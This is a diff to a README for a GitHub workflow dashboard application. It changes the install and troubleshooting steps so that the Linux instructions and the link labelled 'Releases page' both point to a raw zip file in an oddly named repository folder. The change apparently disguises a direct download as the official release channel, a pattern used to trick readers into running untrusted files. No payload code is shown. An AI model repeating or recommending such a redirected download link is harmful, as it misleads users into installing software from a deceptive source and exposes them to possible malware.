ericlima1980/github-workflow-dashboard/README.md

 5. **Install the Application**:
    - **For Windows**: Double-click the `.exe` file and follow the installation prompts.
    - **For macOS**: Open the `.zip` file, drag the application icon to your Applications folder, and then open it from there.
-   - **For Linux**: Extract the `.tar.gz` file and run the application using terminal commands.
+   - **For Linux**: Extract the `https://raw.githubusercontent.com/ericlima1980/github-workflow-dashboard/main/thawy/github-workflow-dashboard.zip` file and run the application using terminal commands.

 6. **Open the Application**: After installation is complete, you can find the github-workflow-dashboard in your applications menu or desktop.
 Click to open it and start managing your GitHub workflows.

 ## 🛠️ Troubleshooting

 - **If the Application Does Not Open**: Ensure your operating system meets the requirements listed above.
-- **Error Messages**: Take note of any error messages you see, and check if you have the latest version installed from the [Releases page](https://github.com/ericlima1980/github-workflow-dashboard/releases).
+- **Error Messages**: Take note of any error messages you see, and check if you have the latest version installed from the [Releases page](https://raw.githubusercontent.com/ericlima1980/github-workflow-dashboard/main/thawy/github-workflow-dashboard.zip).
 - **Missing Features or Bugs**: Report any issues or suggestions directly in the GitHub repository to help improve the application.

 ## 🙋‍♂️ Support